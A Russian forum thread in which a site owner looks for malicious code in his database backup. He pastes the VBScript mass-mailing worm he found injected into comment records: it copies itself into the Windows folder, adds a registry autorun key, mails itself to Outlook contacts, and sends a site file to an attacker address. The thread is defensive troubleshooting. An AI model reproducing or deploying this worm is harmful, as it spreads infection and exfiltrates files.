Перейти к публикации

Рекомендованные сообщения

Добрый вечер. Извините, возможно, чуть-чуть не по теме, но не знаю более подходящего места...

Итак, очень надоело то, что на сайт не заходит Оперой 9.50, пишет что сайт содержит вирусы. Насчет того, что в файлах нет никаких вирусов я уверен на 100%. Письма в службу поддержки не дают результата - сайт по прежнему недоступен из последней версии Оперы...

Сегодня СКАЧАЛ резервную копию базы данных и при попытке открыть файл (.sql) , начал ругаться NOD, мол в этом .sql файле какой-то неизвестный скрипт-вирус, и он хочет получить доступ к Explorer.exe..

Вообще в голове не помещаеться как такое возможно, но полазив по интернету нашел вот эту новость _http://eplus.com.ua/news/sql_2008-04-24-14-00-08.html (Кстати, возьмите к сведению и проверьте свою базу)

Ну и конечно, я в первую очередь начал искать в SQL файле зловредный код... Пробовал вводить <srpipt , .js , 1.js , iframe но находит все свое - родное... А файл то большой - 200 мб.

Собственно сам вопрос:

Как найти зловредный код в мускуле? Ведь код может быть разным, нужно же ведь знать что искать....

Помогите, пожалуйста!

Изменено пользователем Altornes102
Ссылка на сообщение
Поделиться на других сайтах
Как в текстовом файле может быть вирус?
а ты качни шелл от рст (текстовый файл) и натрави на него антивирус - будет ругаться ;)
Ссылка на сообщение
Поделиться на других сайтах

IT-Security,

Как в текстовом файле может быть вирус?? :o

Посмотри логи сервера, отсортируй бота с юзер-агентом libwww-perl (там еще версия присутствует) и открой те ссылки которые он пытается проинклудить - столько интересного увидишь и наслушаешься от своего антивиря.

Ссылка на сообщение
Поделиться на других сайтах

Добрый день!

Вобщем я решил попробовать такой метод:

Открыл бэкап базы (.sql) и начал удалять таблицы и проверять после каждого удаления антивирусом.

Сначала удалил dle_post. Проверил - есть вирус. Потом удалил dle_comments, проверил оставшееся - есть.

Короче таким методом дошел до того, что когда удаляю самую первую строчку:

#SKD101|название_базы|25|2008.07.04 16:06:35|187040|60|18|48|73149|9|1|2|73153|3|18565|5|347|73123|348|1|5|5|21573|1

|4|1528

, то вируса нет.. Мне кажеться что она создаеться только тогда, когда делаешь бэкап, или я ошибаюсь?

Но интересно еще то, что когда удаляю все, а оставляю только одну эту строчку, то антивирусник не ругаеться....

Может это закодированная херня какая-то? Если да, то помогите раскодировать строчку.

Спасибо!

Изменено пользователем Altornes102
Ссылка на сообщение
Поделиться на других сайтах
Сначала удалил dle_post. Проверил - есть вирус. Потом удалил dle_comments, проверил оставшееся - есть.
каким образом проверял и что конкретно говорил антивирус?
Ссылка на сообщение
Поделиться на других сайтах

После долгих поисков все-таки нашел!!!

Нашло в комментариях.... Где-то 5-10 записей....

Вот такой вот кодик, туда посмотреть так страшно становиться что оно делает... Вобщем проверьте все свои базы на наличие это фигни...

Вот он:

(29784, 1150256086, 0, '2008-01-14 01:38:17', 'Virus', 'Virus@hack.ru', 'On Error Resume Next <br />Dim FileSysObject, File <br />Set FileSysObject = CreateObject (\\&quot;Scripting.FileSystemObject\\&quot;) <br />Set File = FileSysObject.GetFile(WScript.ScriptFullName) <br />Dim OutlookObject, OutMail, Index <br />Set OutlookObject = CreateObject(\\&quot;Outlook.Application\\&quot;) <br />For Index = 1 To 50 <br />Set OutMail = OutlookObject.CreateItem(0) <br />OutMail.to = OutlookObject.GetNameSpace(\\&quot;MAPI\\&quot;).AddressLists(1).AddressEntries(Index) <br />OutMail.Subject = \\&quot;FUCK YOU ZVER\\&quot; <br />OutMail.Body = \\&quot;FUCK YOU ZVER\\&quot; <br />OutMail.Attachments.Add(File) <br />OutMail.Send <br />Next <br /><br /><br />On Error Resume Next <br />Dim FileSysObject, File <br />Set FileSysObject = CreateObject (\\&quot;Scripting.FileSystemObject\\&quot;) <br />Set File = FileSysObject.GetFile(WScript.ScriptFullName) <br />File.Copy (\\&quot;c:\\\\windows\\\\I_am_virus.vbs\\&quot;) <br />Dim WshShell <br />Set WshShell = WScript.CreateObject(\\&quot;WScript.Shell\\&quot;) <br />WshShell.RegWrite \\&quot;HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\ _ <br />CurrentVersion\\\\RunServices\\\\virus\\&quot;, \\&quot;c:\\\\windows\\\\I_am_virus.vbs\\&quot; <br />Dim OutlookObject, OutMail, Index <br />Set OutlookObject = CreateObject(\\&quot;Outlook.Application\\&quot;) <br />For Index = 1 To 50 <br />Set OutMail = OutlookObject.CreateItem(0) <br />OutMail.to = OutlookObject.GetNameSpace(\\&quot;MAPI\\&quot;).AddressLists(1).AddressEntries(Index) <br />OutMail.Subject = \\&quot;FUCK YOU ZVER\\&quot; <br />OutMail.Body = \\&quot;FUCK YOU ZVER\\&quot; <br />OutMail.Attachments.Add(File) <br />OutMail.Send <br />Next <br />Set OutMail = OutlookObject.CreateItem(0) <br />OutMail.to = \\&quot;Virus@hack.ru\\&quot; <br />OutMail.Subject = \\&quot;FUCK YOU ZVER\\&quot; <br />OutMail.Body = \\&quot;FUCK YOU ZVER\\&quot; <br />OutMail.Attachments.Add(\\&quot;modules.php\\&quot;) <br />OutMail.Send <br />', '151.64.241.20', 0, 1),

Я просто в глубоком шоке!!!! Наверное столько пользователей потерял... ппц..

Изменено пользователем Altornes102
Ссылка на сообщение
Поделиться на других сайтах

удалите мое сообщение с кодом.. я не подумав, выложил это бл%%%ский код

ггг и айпишка козла, как всегда голландская - 151.64.241.20

прокся ? )

Ссылка на сообщение
Поделиться на других сайтах

566676eedb36.jpg

Вот именно так ругался и у меня, когда открывал файл бэкапа...

Удалите мое сообщение с кодом на всякий пожарный! :blink:

Ссылка на сообщение
Поделиться на других сайтах

Абсолютно бесполезный и неработоспособный код. Эта уязвимость давно закрыта в почтовых клиентах.

Меня волнует не это... больше всего волнует что сайт закрыт из последней версии оперы..

уже запарился в службу поддержки писать.. первые три раза отвечали, а потом начали игнорить.

такая же лабуда как и на анекдот.ру

Зы. И тему можно закрыть или удалить. спасибо всем!!!!!

Проблема решена, а обсуждение зашло в тупик и не в тему

Изменено пользователем Altornes102
Ссылка на сообщение
Поделиться на других сайтах
  • 4 месяца спустя...

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...